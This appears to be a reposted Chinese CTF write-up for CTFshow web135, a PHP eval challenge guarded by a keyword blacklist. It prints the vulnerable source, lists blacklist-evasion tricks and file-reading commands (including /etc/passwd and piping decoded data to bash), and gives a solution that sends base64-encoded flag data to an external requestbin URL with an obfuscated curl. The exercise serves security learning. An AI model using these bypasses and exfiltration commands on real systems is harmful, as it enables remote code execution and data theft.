目錄

• 源碼
• 思路
• 題解
• 總結

---

源碼

<?php/* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03*/error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){eval(substr($F,0,6));}else{die("師傅們居然破解了前面的，那就來一個加強版吧");} }

---

思路

非預期

可以用這些繞過關鍵字過濾

\ ' "

可以參考下我的博客

https://blog.csdn.net/Kracxi/article/details/121896054

下面可以選一個能用的輸出flag，curl不能用可以用ping

od nlnl${PATH:${#TERM}:${SHLVL:~A}}${PATH:${#RANDOM}:${#SHLVL:~A}}${PATH:~A}${PATH:${#RANDOM}:${#SHLVL:~A}}/bin/cat${HOME:${#}:${##}}???${HOME:${#}:${##}}??${HOME:${#HOSTNAME}:${#SHLVL}}xxd less ca\t ca''t more rev/bin/revfmt base64/bin/base64code=${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}tac ｜ cat的倒序 tail php /flag sh /flag ｜ 利用報錯出flag paste /flag /etc/passwd ｜ 可以兩個一起讀 diff /flag.txt /etc/passwd curl file:///flag sed -n "p" /flag bzless /flag bzmore /flag sort echo "[base64==]" | base64 -d | bash echo "[hex]" | xxd -r -p | bash

盲注的話可以${string:start:length}來截取字符

題解

cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag | bas\e64`

cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag2 | bas\e64`

拼一下就好了

---

總結

Y1ng師傅 yyds

總結

以上是生活随笔為你收集整理的CTFshow php特性 web135的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。